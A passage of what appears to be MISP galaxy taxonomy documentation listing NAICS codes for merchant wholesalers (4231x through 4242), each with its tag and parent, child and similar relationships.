  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42311" with estimative-language:likelihood-probability="likely"

42312

Motor Vehicle Supplies and New Parts Merchant Wholesalers

The tag is: misp-galaxy:naics="42312"

42312 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423120" with estimative-language:likelihood-probability="likely"

423120

Motor Vehicle Supplies and New Parts Merchant Wholesalers

The tag is: misp-galaxy:naics="423120"

423120 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42312" with estimative-language:likelihood-probability="likely"

42313

Tire and Tube Merchant Wholesalers

The tag is: misp-galaxy:naics="42313"

42313 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423130" with estimative-language:likelihood-probability="likely"

423130

Tire and Tube Merchant Wholesalers

The tag is: misp-galaxy:naics="423130"

423130 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42313" with estimative-language:likelihood-probability="likely"

42314

Motor Vehicle Parts (Used) Merchant Wholesalers

The tag is: misp-galaxy:naics="42314"

42314 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423140" with estimative-language:likelihood-probability="likely"

423140

Motor Vehicle Parts (Used) Merchant Wholesalers

The tag is: misp-galaxy:naics="423140"

423140 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42314" with estimative-language:likelihood-probability="likely"

4232

Furniture and Home Furnishing Merchant Wholesalers

The tag is: misp-galaxy:naics="4232"

4232 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423220" with estimative-language:likelihood-probability="likely"

42321

Furniture Merchant Wholesalers

The tag is: misp-galaxy:naics="42321"

42321 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423210" with estimative-language:likelihood-probability="likely"

423210

Furniture Merchant Wholesalers

The tag is: misp-galaxy:naics="423210"

423210 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42321" with estimative-language:likelihood-probability="likely"

42322

Home Furnishing Merchant Wholesalers

The tag is: misp-galaxy:naics="42322"

42322 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423220" with estimative-language:likelihood-probability="likely"

423220

Home Furnishing Merchant Wholesalers

The tag is: misp-galaxy:naics="423220"

423220 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42322" with estimative-language:likelihood-probability="likely"

4233

Lumber and Other Construction Materials Merchant Wholesalers

The tag is: misp-galaxy:naics="4233"

4233 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42339" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423390" with estimative-language:likelihood-probability="likely"

42331

Lumber, Plywood, Millwork, and Wood Panel Merchant Wholesalers

The tag is: misp-galaxy:naics="42331"

42331 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423310" with estimative-language:likelihood-probability="likely"

423310

Lumber, Plywood, Millwork, and Wood Panel Merchant Wholesalers

The tag is: misp-galaxy:naics="423310"

423310 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42331" with estimative-language:likelihood-probability="likely"

42332

Brick, Stone, and Related Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42332"

42332 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423320" with estimative-language:likelihood-probability="likely"

423320

Brick, Stone, and Related Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423320"

423320 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42332" with estimative-language:likelihood-probability="likely"

42333

Roofing, Siding, and Insulation Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42333"

42333 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423330" with estimative-language:likelihood-probability="likely"

423330

Roofing, Siding, and Insulation Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423330"

423330 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42333" with estimative-language:likelihood-probability="likely"

42339

Other Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42339"

42339 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423390" with estimative-language:likelihood-probability="likely"

423390

Other Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423390"

423390 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42339" with estimative-language:likelihood-probability="likely"

4234

Professional and Commercial Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4234"

4234 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42342" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42343" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42344" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423440" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42345" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423450" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42346" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423460" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42349" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423490" with estimative-language:likelihood-probability="likely"

42341

Photographic Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42341"

42341 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423410" with estimative-language:likelihood-probability="likely"

423410

Photographic Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423410"

423410 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42341" with estimative-language:likelihood-probability="likely"

42342

Office Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42342"

42342 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423420" with estimative-language:likelihood-probability="likely"

423420

Office Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423420"

423420 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42342" with estimative-language:likelihood-probability="likely"

42343

Computer and Computer Peripheral Equipment and Software Merchant Wholesalers

The tag is: misp-galaxy:naics="42343"

42343 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423430" with estimative-language:likelihood-probability="likely"

423430

Computer and Computer Peripheral Equipment and Software Merchant Wholesalers

The tag is: misp-galaxy:naics="423430"

423430 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42343" with estimative-language:likelihood-probability="likely"

42344

Other Commercial Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42344"

42344 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423440" with estimative-language:likelihood-probability="likely"

423440

Other Commercial Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423440"

423440 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42344" with estimative-language:likelihood-probability="likely"

42345

Medical, Dental, and Hospital Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42345"

42345 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423450" with estimative-language:likelihood-probability="likely"

423450

Medical, Dental, and Hospital Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423450"

423450 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42345" with estimative-language:likelihood-probability="likely"

42346

Ophthalmic Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42346"

42346 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423460" with estimative-language:likelihood-probability="likely"

423460

Ophthalmic Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="423460"

423460 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42346" with estimative-language:likelihood-probability="likely"

42349

Other Professional Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42349"

42349 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423490" with estimative-language:likelihood-probability="likely"

423490

Other Professional Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423490"

423490 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42349" with estimative-language:likelihood-probability="likely"

4235

Metal and Mineral (except Petroleum) Merchant Wholesalers

The tag is: misp-galaxy:naics="4235"

4235 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42352" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423520" with estimative-language:likelihood-probability="likely"

42351

Metal Service Centers and Other Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="42351"

42351 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423510" with estimative-language:likelihood-probability="likely"

423510

Metal Service Centers and Other Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="423510"

423510 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42351" with estimative-language:likelihood-probability="likely"

42352

Coal and Other Mineral and Ore Merchant Wholesalers

The tag is: misp-galaxy:naics="42352"

42352 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423520" with estimative-language:likelihood-probability="likely"

423520

Coal and Other Mineral and Ore Merchant Wholesalers

The tag is: misp-galaxy:naics="423520"

423520 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42352" with estimative-language:likelihood-probability="likely"

4236

Household Appliances and Electrical and Electronic Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="4236"

4236 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423610" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42362" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423620" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42369" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423690" with estimative-language:likelihood-probability="likely"

42361

Electrical Apparatus and Equipment, Wiring Supplies, and Related Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42361"

42361 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423610" with estimative-language:likelihood-probability="likely"

423610

Electrical Apparatus and Equipment, Wiring Supplies, and Related Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423610"

423610 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42361" with estimative-language:likelihood-probability="likely"

42362

Household Appliances, Electric Housewares, and Consumer Electronics Merchant Wholesalers

The tag is: misp-galaxy:naics="42362"

42362 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423620" with estimative-language:likelihood-probability="likely"

423620

Household Appliances, Electric Housewares, and Consumer Electronics Merchant Wholesalers

The tag is: misp-galaxy:naics="423620"

423620 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42362" with estimative-language:likelihood-probability="likely"

42369

Other Electronic Parts and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42369"

42369 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423690" with estimative-language:likelihood-probability="likely"

423690

Other Electronic Parts and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423690"

423690 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42369" with estimative-language:likelihood-probability="likely"

4237

Hardware, and Plumbing and Heating Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4237"

4237 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42371" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42372" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423720" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42373" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423730" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42374" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423740" with estimative-language:likelihood-probability="likely"

42371

Hardware Merchant Wholesalers

The tag is: misp-galaxy:naics="42371"

42371 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423710" with estimative-language:likelihood-probability="likely"

423710

Hardware Merchant Wholesalers

The tag is: misp-galaxy:naics="423710"

423710 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42371" with estimative-language:likelihood-probability="likely"

42372

Plumbing and Heating Equipment and Supplies (Hydronics) Merchant Wholesalers

The tag is: misp-galaxy:naics="42372"

42372 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423720" with estimative-language:likelihood-probability="likely"

423720

Plumbing and Heating Equipment and Supplies (Hydronics) Merchant Wholesalers

The tag is: misp-galaxy:naics="423720"

423720 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42372" with estimative-language:likelihood-probability="likely"

42373

Warm Air Heating and Air-Conditioning Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42373"

42373 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423730" with estimative-language:likelihood-probability="likely"

423730

Warm Air Heating and Air-Conditioning Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423730"

423730 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42373" with estimative-language:likelihood-probability="likely"

42374

Refrigeration Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42374"

42374 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423740" with estimative-language:likelihood-probability="likely"

423740

Refrigeration Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423740"

423740 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42374" with estimative-language:likelihood-probability="likely"

4238

Machinery, Equipment, and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4238"

4238 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42381" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423810" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42382" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423820" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42383" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423830" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42384" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423840" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42385" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423850" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42386" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423860" with estimative-language:likelihood-probability="likely"

42381

Construction and Mining (except Oil Well) Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42381"

42381 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423810" with estimative-language:likelihood-probability="likely"

423810

Construction and Mining (except Oil Well) Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423810"

423810 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42381" with estimative-language:likelihood-probability="likely"

42382

Farm and Garden Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42382"

42382 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423820" with estimative-language:likelihood-probability="likely"

423820

Farm and Garden Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423820"

423820 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42382" with estimative-language:likelihood-probability="likely"

42383

Industrial Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42383"

42383 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423830" with estimative-language:likelihood-probability="likely"

423830

Industrial Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423830"

423830 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42383" with estimative-language:likelihood-probability="likely"

42384

Industrial Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42384"

42384 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423840" with estimative-language:likelihood-probability="likely"

423840

Industrial Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423840"

423840 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42384" with estimative-language:likelihood-probability="likely"

42385

Service Establishment Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42385"

42385 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423850" with estimative-language:likelihood-probability="likely"

423850

Service Establishment Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423850"

423850 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42385" with estimative-language:likelihood-probability="likely"

42386

Transportation Equipment and Supplies (except Motor Vehicle) Merchant Wholesalers

The tag is: misp-galaxy:naics="42386"

42386 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423860" with estimative-language:likelihood-probability="likely"

423860

Transportation Equipment and Supplies (except Motor Vehicle) Merchant Wholesalers

The tag is: misp-galaxy:naics="423860"

423860 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42386" with estimative-language:likelihood-probability="likely"

4239

Miscellaneous Durable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="4239"

4239 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42393" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423990" with estimative-language:likelihood-probability="likely"

42391

Sporting and Recreational Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42391"

42391 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423910" with estimative-language:likelihood-probability="likely"

423910

Sporting and Recreational Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423910"

423910 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42391" with estimative-language:likelihood-probability="likely"

42392

Toy and Hobby Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42392"

42392 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423920" with estimative-language:likelihood-probability="likely"

423920

Toy and Hobby Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423920"

423920 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42392" with estimative-language:likelihood-probability="likely"

42393

Recyclable Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42393"

42393 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423930" with estimative-language:likelihood-probability="likely"

423930

Recyclable Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423930"

423930 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42393" with estimative-language:likelihood-probability="likely"

42394

Jewelry, Watch, Precious Stone, and Precious Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="42394"

42394 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423940" with estimative-language:likelihood-probability="likely"

423940

Jewelry, Watch, Precious Stone, and Precious Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="423940"

423940 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42394" with estimative-language:likelihood-probability="likely"

42399

Other Miscellaneous Durable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42399"

42399 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423990" with estimative-language:likelihood-probability="likely"

423990

Other Miscellaneous Durable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="423990"

423990 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42399" with estimative-language:likelihood-probability="likely"

424

Merchant Wholesalers, Nondurable Goods

The tag is: misp-galaxy:naics="424"

424 has relationships with:

  • child-of: misp-galaxy:naics="42" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

4241

Paper and Paper Product Merchant Wholesalers

The tag is: misp-galaxy:naics="4241"

4241 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424130" with estimative-language:likelihood-probability="likely"

42411

Printing and Writing Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="42411"

42411 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424110" with estimative-language:likelihood-probability="likely"

424110

Printing and Writing Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="424110"

424110 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42411" with estimative-language:likelihood-probability="likely"

42412

Stationery and Office Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42412"

42412 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424120" with estimative-language:likelihood-probability="likely"

424120

Stationery and Office Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424120"

424120 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42412" with estimative-language:likelihood-probability="likely"

42413

Industrial and Personal Service Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="42413"

42413 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424130" with estimative-language:likelihood-probability="likely"

424130

Industrial and Personal Service Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="424130"

424130 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42413" with estimative-language:likelihood-probability="likely"

4242

Drugs and Druggists' Sundries Merchant Wholesalers

The tag is: misp-galaxy:naics="4242"

4242 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

